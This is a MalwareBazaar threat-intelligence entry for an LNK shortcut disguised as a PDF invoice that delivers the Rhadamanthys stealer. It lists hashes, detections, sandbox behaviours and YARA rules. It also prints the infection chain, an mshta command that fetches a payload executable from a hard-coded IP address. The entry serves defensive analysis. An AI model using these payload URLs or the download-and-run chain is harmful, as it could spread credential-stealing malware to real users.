MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 e7dec31185f1555bb009e5f7348a31f98bb0d60c82d81c6ab42f95d6715ca6dc. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Rhadamanthys


Vendor detections: 9


Intelligence 9 IOCs YARA 3 File information Comments

SHA256 hash: e7dec31185f1555bb009e5f7348a31f98bb0d60c82d81c6ab42f95d6715ca6dc
SHA3-384 hash: e5608b094414302eddf4c2656f3a4f75eb370f123b3fd48e76914541d6da209768903ddb5d51706fd68bb7e0b26af2b4
SHA1 hash: af42a6e2c1b97a958cf9e50a30cdf02221c07098
MD5 hash: 6b602c96ff01c4f55c7a625b2358a988
humanhash: monkey-texas-sodium-mobile
File name:Factura_SA161.pdf.lnk
Download: download sample
Signature Rhadamanthys
File size:2'003 bytes
First seen:2024-04-18 14:00:41 UTC
Last seen:2024-04-18 16:08:51 UTC
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 24:8WYaNkDmgihopv94zcuhJBkr+/4p+8Pxu3Hgqdd79dsW28mT84abtl868z7m:8WYamDmux9AJA7gndJ9pn4a46q
TLSH T1154114051BFD1731E3F3893610BA97319E76B405DE56AB1E019113841812B01F864F7F
Reporter rmceoin
Tags:lnk Rhadamanthys


Avatar
rmceoin
91.92.253.126/Downloads/Factura_SA161.pdf.lnk
Thu, 11 Apr 2024 09:57:23 GMT
e7dec31185f1555bb009e5f7348a31f98bb0d60c82d81c6ab42f95d6715ca6dc
machine_identifier: nldw3-3-06-42
LNK > mshta http://93.190.140.76/factura > http://93.190.140.76/DisabilityCharge.exe

Decoy: http://93.190.140.76/SA160.pdf

Intelligence


File Origin
# of uploads :
2
# of downloads :
179
Origin country :
US US
Vendor Threat Intelligence
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Payload URLs
URL
File name
http://93.190.140.76/factura
LNK File
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
forfiles lolbin masquerade mshta powershell
Result
Verdict:
MALICIOUS
Details
IPv4 Dotted Quad URL
A URL was detected referencing a direct IP address, as opposed to a domain name.
Result
Threat name:
RHADAMANTHYS
Detection:
malicious
Classification:
rans.troj.evad
Score:
100 / 100
Signature
Antivirus detection for URL or domain
Checks if the current machine is a virtual machine (disk enumeration)
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
Behaviour
Behavior Graph:
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428152 Sample: Factura_SA161.pdf.lnk Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 70 WnPTaVSLwChHmHUZLZbxxYzryHGcJ.WnPTaVSLwChHmHUZLZbxxYzryHGcJ 2->70 84 Malicious sample detected (through community Yara rule) 2->84 86 Antivirus detection for URL or domain 2->86 88 Windows shortcut file (LNK) starts blacklisted processes 2->88 90 9 other signatures 2->90 13 forfiles.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 114 Windows shortcut file (LNK) starts blacklisted processes 13->114 19 powershell.exe 7 13->19         started        22 conhost.exe 1 13->22         started        68 127.0.0.1 unknown unknown 16->68 signatures6 process7 signatures8 92 Windows shortcut file (LNK) starts blacklisted processes 19->92 94 Powershell drops PE file 19->94 24 mshta.exe 16 19->24         started        process9 dnsIp10 78 93.190.140.76, 49704, 49708, 80 WORLDSTREAMNL Netherlands 24->78 64 C:\Users\user\AppData\Local\...\factura[1], PE32 24->64 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 24->108 110 Suspicious powershell command line found 24->110 112 Very long command line found 24->112 29 powershell.exe 17 18 24->29         started        file11 signatures12 process13 file14 66 C:\Users\user\...\DisabilityCharge.exe, PE32 29->66 dropped 32 DisabilityCharge.exe 29->32         started        35 Acrobat.exe 61 29->35         started        37 conhost.exe 29->37         started        process15 signatures16 80 Windows shortcut file (LNK) starts blacklisted processes 32->80 82 Multi AV Scanner detection for dropped file 32->82 39 cmd.exe 32->39         started        43 AcroCEF.exe 104 35->43         started        process17 file18 62 C:\Users\user\AppData\Local\...\Cheers.pif, PE32 39->62 dropped 96 Windows shortcut file (LNK) starts blacklisted processes 39->96 98 Uses ping.exe to sleep 39->98 100 Drops PE files with a suspicious file extension 39->100 102 Uses ping.exe to check the status of other devices and networks 39->102 45 Cheers.pif 39->45         started        48 conhost.exe 39->48         started        50 tasklist.exe 39->50         started        55 8 other processes 39->55 52 AcroCEF.exe 43->52         started        signatures19 process20 dnsIp21 116 Machine Learning detection for dropped file 45->116 57 dialer.exe 45->57         started        60 WerFault.exe 45->60         started        72 184.25.164.138, 443, 49724 BBIL-APBHARTIAirtelLtdIN United States 52->72 74 54.144.73.197, 443, 49719, 49722 AMAZON-AESUS United States 52->74 76 184.31.60.185, 443, 49715 AKAMAI-ASUS United States 52->76 signatures22 process23 signatures24 104 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 57->104 106 Checks if the current machine is a virtual machine (disk enumeration) 57->106
Threat name:
Shortcut.Trojan.Rhadamanthys
Status:
Malicious
First seen:
2024-04-18 14:01:04 UTC
File Type:
Binary
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Result
Malware family:
rhadamanthys
Score:
  10/10
Tags:
family:rhadamanthys stealer
Behaviour
Checks processor information in registry
Enumerates processes with tasklist
Modifies Internet Explorer settings
Modifies registry class
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
Drops file in System32 directory
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Malware Config
Dropper Extraction:
http://93.190.140.76/factura
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:EXE_in_LNK
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:PS_in_LNK
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

  
Delivery method
Distributed via web download

Comments